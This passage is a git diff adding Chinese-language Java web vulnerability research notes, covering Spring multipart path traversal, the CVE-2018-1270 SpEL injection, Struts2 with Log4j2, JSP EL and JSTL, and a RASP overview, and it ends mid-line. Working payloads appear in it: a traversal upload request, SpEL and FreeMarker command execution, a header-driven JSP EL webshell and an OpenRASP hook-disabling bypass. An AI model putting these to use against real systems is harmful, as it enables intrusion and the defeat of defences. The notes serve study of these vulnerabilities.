20220818202952.png new file mode 100644 index 00000000..90b83ae0 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818202952.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818203007.png b/framework/web/spring boot/img/Pasted image 20220818203007.png new file mode 100644 index 00000000..e66ff662 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203007.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818203017.png b/framework/web/spring boot/img/Pasted image 20220818203017.png new file mode 100644 index 00000000..069e52a2 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203017.png differ diff --git a/framework/web/spring boot/img/Pasted image 20220818203038.png b/framework/web/spring boot/img/Pasted image 20220818203038.png new file mode 100644 index 00000000..e6512f58 Binary files /dev/null and b/framework/web/spring boot/img/Pasted image 20220818203038.png differ diff --git a/framework/web/spring webflux/README.md b/framework/web/spring webflux/README.md new file mode 100644 index 00000000..a1e1cc2a --- /dev/null +++ b/framework/web/spring webflux/README.md @@ -0,0 +1,23 @@ +前置基础 +--- + +**应用简介** + +WebFlux 是一个 Spring 响应式 Web 框架。它已添加到 Spring 5 中。它是完全非阻塞的,支持 reactive streams 响应流,并且可以很好运行在 Netty,Undertow 和 Servlet 3.1 + 容器等服务器上, 是传统 Spring MVC 的一个替代方案。 +Spring WebFlux 在内部使用 Project Reactor 和它的 Publisher 实现 Flux 和 Mono。它支持两种编程模型:a)基于注释的响应式组件,b)函数级别的路由和处理。 + + + + +相关漏洞 +--- + + +研究利用 +--- + +### 回显 + + +### 内存马 + diff --git "a/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" "b/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" new file mode 100644 index 00000000..11059c39 --- /dev/null +++ "b/framework/web/spring/spring framework/CommonsMultipartFile.getOriginalFilename 347円273円225円350円277円207円.md" @@ -0,0 +1,37 @@ +前置条件 + +- spring-web <= 4.1.8.RELEASE 对应 spingboot <= v1.2.7.RELEASE +- Windows + + +``` +\org\springframework\spring-web4円.0.8.RELEASE\spring-web-4.1.8.RELEASE.jar!\org\springframework\web\multipart\commons\CommonsMultipartFile.class +``` + +```http +POST /upload HTTP/1.1 +Host: localhost:9090 +Content-Type: multipart/form-data; boundary=2022 +Content-Length: 114 + +--2022 +Content-Disposition: form-data; name="file"; filename="../..\\..\\..\\flag.txt" + +hello world +--2022-- +``` + +- org.springframework.web.multipart.commons.CommonsMultipartFile#getOriginalFilename + +![](img/Pasted%20image%2020220818204052.png) + +- `filename="../..\\..\\..\\flag.txt"` or `filename="../..\..\..\flag.txt"` +- pos = 2 且 != -1 ,所以不会对 `\` 进行处理 +- 而Windows是支持 `..\` 和 `..\\`的 + - ![](img/Pasted%20image%2020220818204102.png) +- 从而可以进行路径穿越 + + +修复: + +![](img/Pasted%20image%2020220818204110.png) diff --git a/framework/web/spring/spring framework/README.md b/framework/web/spring/spring framework/README.md new file mode 100644 index 00000000..f81fa7d6 --- /dev/null +++ b/framework/web/spring/spring framework/README.md @@ -0,0 +1,24 @@ +前置基础 +--- + + + +相关漏洞 +--- + +### Spring CVE-2010-1622 RCE + +- [SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析](http://rui0.cn/archives/1158) + +### Spring 2022-03-29 RCE +> 占坑 + +- 用jdk9的特性绕过,然后结合某机制写入文件 + +![image](https://user-images.githubusercontent.com/55024146/160760457-76e430f2-e21e-4e08-92f3-6b82402d4029.png) + + +利用研究 +--- + +- Spring Boot Fat Jar + 任意文件写入 diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204052.png b/framework/web/spring/spring framework/img/Pasted image 20220818204052.png new file mode 100644 index 00000000..59f7c672 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204052.png differ diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204102.png b/framework/web/spring/spring framework/img/Pasted image 20220818204102.png new file mode 100644 index 00000000..d246fe68 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204102.png differ diff --git a/framework/web/spring/spring framework/img/Pasted image 20220818204110.png b/framework/web/spring/spring framework/img/Pasted image 20220818204110.png new file mode 100644 index 00000000..e6512f58 Binary files /dev/null and b/framework/web/spring/spring framework/img/Pasted image 20220818204110.png differ diff --git a/framework/web/spring/spring messaging/README.md b/framework/web/spring/spring messaging/README.md new file mode 100644 index 00000000..d7350bde --- /dev/null +++ b/framework/web/spring/spring messaging/README.md @@ -0,0 +1,107 @@ +前置基础 +--- + + +相关漏洞 +--- + +### CVE-2018-1270 SpEL Injection RCE + +#### 环境搭建 + +``` +git clone git@github.com:spring-guides/gs-messaging-stomp-websocket.git +cd gs-messaging-stomp-websocket +git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3 +cd complete +mvn spring-boot:run +``` + +![image-20211116215130852](vulnerability-research.assets/image-20211116215130852.png) + +#### 漏洞复现 + +篡改app.js的内容,插入恶意selector代码: + +```js +function connect() { + var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"}; + var socket = new SockJS('/gs-guide-websocket'); + stompClient = Stomp.over(socket); + stompClient.connect({}, function (frame) { + setConnected(true); + console.log('Connected: ' + frame); + stompClient.subscribe('/topic/greetings', function (greeting) { + showGreeting(JSON.parse(greeting.body).content); + },header); + }); +} +``` + +![image-20211116215228659](vulnerability-research.assets/image-20211116215228659.png) + +然后保存 Ctrl + S,然后点击Connect再随便Send一些字符,成功触发漏洞 + +![image-20211116215431393](vulnerability-research.assets/image-20211116215431393.png) + +#### 漏洞分析 + +sink处下断点 + +![image](https://user-images.githubusercontent.com/55024146/161274708-3707482e-3f07-47c2-8a1b-7c638bd826cb.png) + +获取调用栈 +```java +getRuntime:58, Runtime (java.lang) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +execute:120, ReflectiveMethodExecutor (org.springframework.expression.spel.support) +getValueInternal:107, MethodReference (org.springframework.expression.spel.ast) +getValueInternal:90, MethodReference (org.springframework.expression.spel.ast) +getValueRef:58, CompoundExpression (org.springframework.expression.spel.ast) +getValueInternal:88, CompoundExpression (org.springframework.expression.spel.ast) +getTypedValue:116, SpelNodeImpl (org.springframework.expression.spel.ast) +getValue:306, SpelExpression (org.springframework.expression.spel.standard) +filterSubscriptions:217, DefaultSubscriptionRegistry (org.springframework.messaging.simp.broker) +findSubscriptionsInternal:186, DefaultSubscriptionRegistry (org.springframework.messaging.simp.broker) +findSubscriptions:127, AbstractSubscriptionRegistry (org.springframework.messaging.simp.broker) +sendMessageToSubscribers:350, SimpleBrokerMessageHandler (org.springframework.messaging.simp.broker) +handleMessageInternal:272, SimpleBrokerMessageHandler (org.springframework.messaging.simp.broker) +handleMessage:241, AbstractBrokerMessageHandler (org.springframework.messaging.simp.broker) +run:138, ExecutorSubscribableChannel$SendTask (org.springframework.messaging.support) +sendInternal:94, ExecutorSubscribableChannel (org.springframework.messaging.support) +send:119, AbstractMessageChannel (org.springframework.messaging.support) +send:105, AbstractMessageChannel (org.springframework.messaging.support) +sendInternal:187, SimpMessagingTemplate (org.springframework.messaging.simp) +doSend:162, SimpMessagingTemplate (org.springframework.messaging.simp) +doSend:48, SimpMessagingTemplate (org.springframework.messaging.simp) +send:108, AbstractMessageSendingTemplate (org.springframework.messaging.core) +convertAndSend:150, AbstractMessageSendingTemplate (org.springframework.messaging.core) +convertAndSend:128, AbstractMessageSendingTemplate (org.springframework.messaging.core) +handleReturnValue:188, SendToMethodReturnValueHandler (org.springframework.messaging.simp.annotation.support) +handleReturnValue:107, HandlerMethodReturnValueHandlerComposite (org.springframework.messaging.handler.invocation) +handleMatch:527, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +handleMatch:497, SimpAnnotationMethodMessageHandler (org.springframework.messaging.simp.annotation.support) +handleMatch:88, SimpAnnotationMethodMessageHandler (org.springframework.messaging.simp.annotation.support) +handleMessageInternal:473, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +handleMessage:409, AbstractMethodMessageHandler (org.springframework.messaging.handler.invocation) +run:138, ExecutorSubscribableChannel$SendTask (org.springframework.messaging.support) +runWorker:1142, ThreadPoolExecutor (java.util.concurrent) +run:617, ThreadPoolExecutor$Worker (java.util.concurrent) +run:745, Thread (java.lang) +``` +回溯找到漏洞代码所在位置 + +![image](https://user-images.githubusercontent.com/55024146/161275489-36c39c81-c66d-43df-8c1b-d02598fe27ea.png) + +建立连接时会将payload通过add方法添加到subs中,此时并没有触发。 + +![image](https://user-images.githubusercontent.com/55024146/161279463-74534fc6-57be-4990-aa86-e6413bf5bd8d.png) + +然后在建立连接后,发送任意内容的消息,在filterSubscriptions方法中获取连接配置(spel injection payload),然后调用expression.getValue(),触发rce。 + +![image](https://user-images.githubusercontent.com/55024146/161277764-376c9ddc-dd7c-41f0-a6f1-fbb6a61859db.png) + + diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png new file mode 100644 index 00000000..efe5ecd4 Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215130852.png differ diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png new file mode 100644 index 00000000..3fd541c4 Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215228659.png differ diff --git a/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png new file mode 100644 index 00000000..de553d4b Binary files /dev/null and b/framework/web/spring/spring messaging/vulnerability-research.assets/image-20211116215431393.png differ diff --git a/framework/web/struts2/CVE-2021-44228.md b/framework/web/struts2/CVE-2021-44228.md new file mode 100644 index 00000000..abc0df33 --- /dev/null +++ b/framework/web/struts2/CVE-2021-44228.md @@ -0,0 +1,102 @@ +## Apache Struts2 RCE via Log4j2 CVE-2021-44228 + +### 环境搭建 +首先搭建环境 +- 下载源码:https://dlcdn.apache.org/struts/2.5.27/struts-2.5.27-all.zip,解压 +- 复制struts-2.5.27\src\apps\showcase文件夹到自己的测试目录,右键用IDEA打开 +- 配置tomcat,启动即可 + +![image](img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png) + +注:确认是否使用log4j2组件 + +![image](img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png) + + +### 漏洞分析 + +根据流传的payload中携带的HTTP头字段`If-Modified-Since`找到对应的源码位置,下断点 + +![image](img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png) + +- org.apache.struts2.dispatcher.DefaultStaticContentLoader#process + +![image](img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png) + + +![image](img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png) + +整个调用栈 +> ```java +> warn:2774, AbstractLogger (org.apache.logging.log4j.spi) +> process:241, DefaultStaticContentLoader (org.apache.struts2.dispatcher) +> findStaticResource:215, DefaultStaticContentLoader (org.apache.struts2.dispatcher) +> executeStaticResourceRequest:59, ExecuteOperations (org.apache.struts2.dispatcher) +> doFilter:81, StrutsExecuteFilter (org.apache.struts2.dispatcher.filter) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:65, SiteMeshFilter (com.opensymphony.sitemesh.webapp) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:92, StrutsPrepareFilter (org.apache.struts2.dispatcher.filter) +> internalDoFilter:193, ApplicationFilterChain (org.apache.catalina.core) +> doFilter:166, ApplicationFilterChain (org.apache.catalina.core) +> invoke:196, StandardWrapperValve (org.apache.catalina.core) +> invoke:97, StandardContextValve (org.apache.catalina.core) +> invoke:544, AuthenticatorBase (org.apache.catalina.authenticator) +> invoke:135, StandardHostValve (org.apache.catalina.core) +> invoke:81, ErrorReportValve (org.apache.catalina.valves) +> invoke:698, AbstractAccessLogValve (org.apache.catalina.valves) +> invoke:78, StandardEngineValve (org.apache.catalina.core) +> service:364, CoyoteAdapter (org.apache.catalina.connector) +> service:624, Http11Processor (org.apache.coyote.http11) +> process:65, AbstractProcessorLight (org.apache.coyote) +> process:831, AbstractProtocol$ConnectionHandler (org.apache.coyote) +> doRun:1650, NioEndpoint$SocketProcessor (org.apache.tomcat.util.net) +> run:49, SocketProcessorBase (org.apache.tomcat.util.net) +> runWorker:1191, ThreadPoolExecutor (org.apache.tomcat.util.threads) +> run:659, ThreadPoolExecutor$Worker (org.apache.tomcat.util.threads) +> run:61, TaskThread$WrappingRunnable (org.apache.tomcat.util.threads) +> run:745, Thread (java.lang) +> ``` + +根据调用栈中的调用情况,分析为什么请求会执行到这里 +- ALT + F7 + +![image](img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png) + +![image](img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png) + +![image](img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png) + +![image](img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png) + +捋一捋其请求的执行流程 +- 1、请求A 首先被StrutsExecuteFilter进行处理 + - execute.executeStaticResourceRequest `处理对静态资源的请求` + ![image](img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png) + +- 2、需要满足条件(请求的静态资源路径以"/struts"或"/static"开头) + - ![image](img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png) + +- 3、条件满足后,执行到org.apache.struts2.dispatcher.DefaultStaticContentLoader#findStaticResource + - 需要满足条件:请求的静态资源需要存在,否则直接返回404 + - 可以通过右键查看源码查找需要的路径 + ![image](img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png) + +- 4、条件满足后,执行到org.apache.struts2.dispatcher.DefaultStaticContentLoader#process + - 构造恶意的If-Modified-Since即可触发log4j2的RCE + ![image](img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png) + + +至此,分析完毕。 + +### 漏洞复现 + + +![image](img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png) + + +参考: + +https://twitter.com/payloadartist/status/1469987703429103622 diff --git a/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png b/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png new file mode 100644 index 00000000..57dbc521 Binary files /dev/null and b/framework/web/struts2/img/145716989-360e998a-0014-44d2-b37c-cce6fd7e310e.png differ diff --git a/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png b/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png new file mode 100644 index 00000000..0db0b6bb Binary files /dev/null and b/framework/web/struts2/img/145717003-47737614-74c3-45e8-89d4-8cd971fdee39.png differ diff --git a/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png b/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png new file mode 100644 index 00000000..2e100b4d Binary files /dev/null and b/framework/web/struts2/img/145717032-722780ec-d87b-4dca-af86-0354e33491fc.png differ diff --git a/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png b/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png new file mode 100644 index 00000000..77624e66 Binary files /dev/null and b/framework/web/struts2/img/145717042-0b40e957-e827-40b1-a258-d89769cb1ad5.png differ diff --git a/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png b/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png new file mode 100644 index 00000000..8c9973ee Binary files /dev/null and b/framework/web/struts2/img/145717219-5339230e-b62d-464d-ab50-4aaa995dcc12.png differ diff --git a/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png b/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png new file mode 100644 index 00000000..f666af31 Binary files /dev/null and b/framework/web/struts2/img/145717306-5a735d51-7867-40b8-85d7-ed3533875387.png differ diff --git a/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png b/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png new file mode 100644 index 00000000..334796ad Binary files /dev/null and b/framework/web/struts2/img/145717438-6546ca05-c3c1-4d3c-ae6b-042906149b29.png differ diff --git a/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png b/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png new file mode 100644 index 00000000..3dbfbe8b Binary files /dev/null and b/framework/web/struts2/img/145717545-86ceb682-0867-49d6-b538-d0a50f73930f.png differ diff --git a/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png b/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png new file mode 100644 index 00000000..f609d59a Binary files /dev/null and b/framework/web/struts2/img/145717566-8eb50b1a-b190-4c2a-8d9e-d556917f2851.png differ diff --git a/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png b/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png new file mode 100644 index 00000000..3f2fd2d0 Binary files /dev/null and b/framework/web/struts2/img/145717713-e8f50df4-3490-43d1-8c76-d01e4a1f7196.png differ diff --git a/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png b/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png new file mode 100644 index 00000000..1176bd0d Binary files /dev/null and b/framework/web/struts2/img/145718094-0007d715-0105-4d0f-8587-af4162f8e077.png differ diff --git a/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png b/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png new file mode 100644 index 00000000..0968af15 Binary files /dev/null and b/framework/web/struts2/img/145718186-123dd677-bb4d-438a-a77b-1b8bdd564841.png differ diff --git a/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png b/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png new file mode 100644 index 00000000..968bada3 Binary files /dev/null and b/framework/web/struts2/img/145718469-f53027a1-6403-4b3a-b0cb-cb481ea24a53.png differ diff --git a/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png b/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png new file mode 100644 index 00000000..93b9ed6c Binary files /dev/null and b/framework/web/struts2/img/145718511-bb6c8844-472f-4238-9781-dd35a4751fbf.png differ diff --git a/javaee/base64/README.md b/javaee/base64/README.md new file mode 100644 index 00000000..e818d5c1 --- /dev/null +++ b/javaee/base64/README.md @@ -0,0 +1,6 @@ +attack scenario +``` +Shiro 利用 Base64 解码差异绕 WAF +``` + +- [Java下奇怪的Base64](http://www.lmxspace.com/2021/01/06/Java%E4%B8%8B%E5%A5%87%E6%80%AA%E7%9A%84Base64/) diff --git a/javaee/bcel/README.md b/javaee/bcel/README.md new file mode 100644 index 00000000..21300501 --- /dev/null +++ b/javaee/bcel/README.md @@ -0,0 +1,21 @@ +前置基础 +--- + + +相关利用 +--- + +### BCEL 编码/解码工具 X-BCELCode.jar + +- BCEL编码/解码,常用于构造反序列化漏洞payload的场景 +``` +# java version "1.8.0_201" +java -jar .\X-BCELCode.jar +``` +![X-BCELCode-1](https://user-images.githubusercontent.com/55024146/159114851-0cad5313-adec-496e-8fdf-17be1ce7b198.png) + +``` +java -jar .\X-BCELCode.jar --encode .\src\Evil.class +java -jar .\X-BCELCode.jar --decode '$$BCEL$$$l8ドルb$I$A$A$A$' +``` +![X-BCELCode-2](https://user-images.githubusercontent.com/55024146/159114854-d162a6a0-e599-42dc-8f14-4e300495bbbe.png) diff --git a/javaee/bcel/X-BCEL.jar b/javaee/bcel/X-BCEL.jar new file mode 100644 index 00000000..063f1d37 Binary files /dev/null and b/javaee/bcel/X-BCEL.jar differ diff --git a/javaee/design pattern/README.md b/javaee/design pattern/README.md new file mode 100644 index 00000000..4ab39574 --- /dev/null +++ b/javaee/design pattern/README.md @@ -0,0 +1,7 @@ +> 记录代码阅读过程中遇到过的设计模式 + +#### 1、访问者模式(Visitor Pattern) + +``` +访问比较复杂的数据结构,不去改变数据结构,而是把对数据的操作抽象出来,在"访问"的过程中以回调形式在访问者中处理操作逻辑。 +``` diff --git a/javaee/expression language/ognl/README.md b/javaee/expression language/ognl/README.md new file mode 100644 index 00000000..f46b767e --- /dev/null +++ b/javaee/expression language/ognl/README.md @@ -0,0 +1 @@ +- [0x02 表达式语言 OGNL](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/#0x02-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E8%AF%AD%E8%A8%80-ognl) diff --git a/javaee/expression language/spel/README.md b/javaee/expression language/spel/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/expression language/spel/README.md @@ -0,0 +1 @@ + diff --git a/javaee/java servlet/README.md b/javaee/java servlet/README.md new file mode 100644 index 00000000..fafbc713 --- /dev/null +++ b/javaee/java servlet/README.md @@ -0,0 +1,5 @@ +> attack vector + +- 权限绕过: getRequestURI() + getServletPath() +- 权限绕过: RequestDispatcher methods +- 条件竞争 diff --git a/javaee/jdbc/h2/README.md b/javaee/jdbc/h2/README.md new file mode 100644 index 00000000..786464c0 --- /dev/null +++ b/javaee/jdbc/h2/README.md @@ -0,0 +1,6 @@ +> RCE + +- JNDI +- RUNSCRIPT + evil.sql (本质: CREATE ALIAS AS) +- CREATE ALIAS AS +- CREATE TRIGGER diff --git a/javaee/jdbc/mysql/README.md b/javaee/jdbc/mysql/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/jdbc/mysql/README.md @@ -0,0 +1 @@ + diff --git a/javaee/jdbc/postgresql/README.md b/javaee/jdbc/postgresql/README.md new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/javaee/jdbc/postgresql/README.md @@ -0,0 +1 @@ + diff --git a/javaee/jsp/README.md b/javaee/jsp/README.md new file mode 100644 index 00000000..f781046b --- /dev/null +++ b/javaee/jsp/README.md @@ -0,0 +1,148 @@ +前置基础 +--- + +### 内置对象 +``` +1、request:表示一次请求,HttpServletRequest +2、response:表示一次响应,HttpServletResponse +3、pageContext:⻚面上下文,获取⻚面信息,PageContext +4、session:表示一次会话,保存用户信息,HttpSession +5、application:表示当前 Web 应用,全局对象,保存所有用户共享信息,ServletContext +6、config:当前 JSP 对应的 Servlet 的 ServletConfig 对象,获取当前 Servlet 的信息 +7、out:向浏览器输出数据,JspWriter +8、page:当前 JSP 对应的 Servlet 对象,Servlet +9、exception:表示 JSP ⻚面发生的异常,Exception +``` + +### response.getRequestDispatcher 和 response.sendRedirect 的区别 +``` +getRequestDispatcher 是将同一个请求传给下一个⻚面 +sendRedirect 是创建一个新的请求传给下一个⻚面,之前的请求结束生命周期 +``` + + +### JSP EL +**简介** + +Expression Language 简称EL,是Java中的一种特殊的通用编程语言,借鉴于JavaScript和XPath。主要作用是在Java Web应用程序嵌入到网页(如JSP)中,用以访问页面的上下文以及不同作用域中的对象 ,取得对象属性的值,或执行简单的运算或判断操作。 +EL获取到某个数据时,会自动进行数据类型的转换。 + +**pom.xml** +> Tomcat 默认携带el-api.jar +```xml + + javax.el + javax.el-api + 2.2.4 + provided + +``` +**常用语法** +``` +${EL表达式} +``` +获取pageContext对象 +```java +${pageContext} +``` +![image](https://user-images.githubusercontent.com/55024146/159130650-1d803e4d-1fec-474b-89fd-39a1f68f0e17.png) + +**EL表达式调用java方法** + +1)新建类并定义静态方法 + +至于为什么得是静态方法? + +![image](https://user-images.githubusercontent.com/55024146/159131463-0f8965ba-3d37-4ec3-8713-a757f56ee415.png) + + +```java +package com.lab; + +import java.io.IOException; + +public class ELTest { + public static String Exec(String cmd) throws IOException { + return Runtime.getRuntime().exec(cmd).toString(); + } +} + +``` +2)在WEB-INF文件夹下(除lib和classess目录外)新建tld文件 +```xml + + + 1.0 + ELTest + http://10.10.10.1:8080/ELTest + + Exec + com.lab.ELTest + java.lang.String Exec(java.lang.String) + + +``` +3)jsp头部导入 +```jsp +<%@ taglib prefix="ELTest" uri="http://10.10.10.1:8080/ELTest" %> +``` +4)el标签使用 +```jsp +${ELTest:Exec("calc")} +``` + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/159131518-e5d5324e-b6cb-4c94-b1c7-1794f3cd49a8.png) + +### JSTL +**简介** + +JSP Standard Tag Library JSP 标准标签库,JSP 为开发者提供的一系列的标签,使用这些标签可以完成 +一些逻辑处理,比如循环遍历集合,让代码更加简洁,不再出现 JSP 脚本穿插的情况。 +实际开发中 EL 和 JSTL 结合起来使用,JSTL 侧重于逻辑处理,EL 负责展示数据。 + + +导入 JSTL 标签库 +``` +<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%> +``` + + +**安全问题-SSRF漏洞** + +标签提供了所有行为标签所具有的功能,同时也允许包含绝对URL。 + +实际案例 +- [蓝凌OA前台SSRF+dataxml.jsp RCE漏洞](https://422926799.github.io/posts/980cff8b.html) + +![image](https://user-images.githubusercontent.com/55024146/159132587-8ded391a-604e-43a2-87c9-d5696b506df8.png) + + +利用研究 +--- + +### JSP + EL构造 Webshell(规避 <%) + +![image](https://user-images.githubusercontent.com/55024146/179147020-e4ce602e-640b-44ab-a431-2056677474b3.png) + +`el.jsp` + +``` +${Runtime.getRuntime().exec(header.cmd)} +``` +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/179147643-956c3938-e89f-4368-b8cd-c54021aad5e3.png) + + + + + + + + + + diff --git a/javaee/rasp/README.md b/javaee/rasp/README.md new file mode 100644 index 00000000..81f82e03 --- /dev/null +++ b/javaee/rasp/README.md @@ -0,0 +1,124 @@ +前置基础 +--- + +**简介** + +Runtime Application Self-protection (RASP) is a security technology that is built or linked into an application or application runtime environment, and is capable of controlling application execution and detecting and preventing real-time attacks. + +by Gartner + +**理解何为 自我保护** + +栗子(命令执行漏洞): + +WAF、IDS等的安全设备是基于 攻击特征 进行检测 & 拦截,非常依赖于规则(只能阻断已知漏洞攻击)。 + +而在RASP技术中,应用程序则清楚自己执行了哪些代码,调用了哪些Java API,执行了哪些命令,所以针对该类型的漏洞只需要在涉及的API之前插入防御逻辑即可(可以阻断未知漏洞)。 + +示例 - Java命令执行的调用栈 + +```bash +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +main:6, CE01 (CommandExecution.Runtime) +``` + +示例 - RASP防御本地系统命令执行检测代码 + +- https://github.com/javasec/javaweb-rasp + +```bash +/** + * RASP防御本地系统命令执行示例 + * Creator: yz + * Date: 2019年07月23日 + */ +public class LocalCommandHookHandler { + + private static final HookResult BLOCK_RESULT = new HookResult(THROW, new RASPHookException(cmdType)); + + /** + * 本地命令执行拦截模块,如果系统执行的CMD命令和请求参数完全一致则直接拦截 + * + * @param command 执行的系统命令 + * @param event Hook事件 + * @return Hook处理结果 + */ + public static HookResult processCommand(List command, MethodHookEvent event) { + String[] commands = command.toArray(new String[0]); + + // 如果当前线程中不包含HTTP请求则不需要检测 + if (event.hasRequest()) { + RASPHttpRequestContext context = event.getRASPContext(); + RASPCachedRequest cachedRequest = context.getCachedRequest(); + + // 检测当前请求是否需要经过安全模块检测和过滤且该模块是否是开启状态 + if (!context.mustFilter(cmdType)) { + return DEFAULT_HOOK_RESULT; + } + + Set cachedParameters = cachedRequest.getCachedParameter(); + + // 只过滤请求参数值,忽略请求参数名称,因为参数名出现命令执行的概率太低 + for (RASPCachedParameter parameterValue : cachedParameters) { + // 请求参数名称 + String key = parameterValue.getKey(); + + // 请求参数值 + String[] values = parameterValue.getValue(); + + // 请求参数出现的位置 + RASPParameterPosition position = parameterValue.getRaspAttackPosition(); + + // 遍历所有的参数值 + for (String value : values) { + if (StringUtils.isEmpty(value)) { + continue; + } + + // 遍历被执行的系统命令 + for (String cmd : commands) { + if (value.equals(cmd)) { + // 添加攻击日志记录 + context.addAttackInfo(new RASPAttackInfo(cmdType, key, commands, position, event, true)); + + return BLOCK_RESULT; + } + } + } + } + + } + + return DEFAULT_HOOK_RESULT; + } + +} +``` + +研究利用 +--- + +### OpenRASP 代码执行 Bypass +> by: potats0 + +- 原因:安全机制在性能消耗上的让步 +- 实现:通过代码执行反射开启"禁用所用hook点"的feature + +```java +try{ + Class clazz = Class.forName("com.baidu.openrasp.config.Config"); + Method m = clazz.getMethod("getConfig", null); + Object o = m.invoke(null, null); + Field disableHooksF = o.getClass().getDeclareField("disableHooks"); + disableHooksF.setAccessible(true); + disableHooksF.set(o, true); +}catch(Exception e){ + e.printStackTrace(); +} +``` diff --git a/javaee/template engine/freemarker/README.md b/javaee/template engine/freemarker/README.md new file mode 100644 index 00000000..c9904c01 --- /dev/null +++ b/javaee/template engine/freemarker/README.md @@ -0,0 +1,5 @@ +``` +<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")} + +<#assign 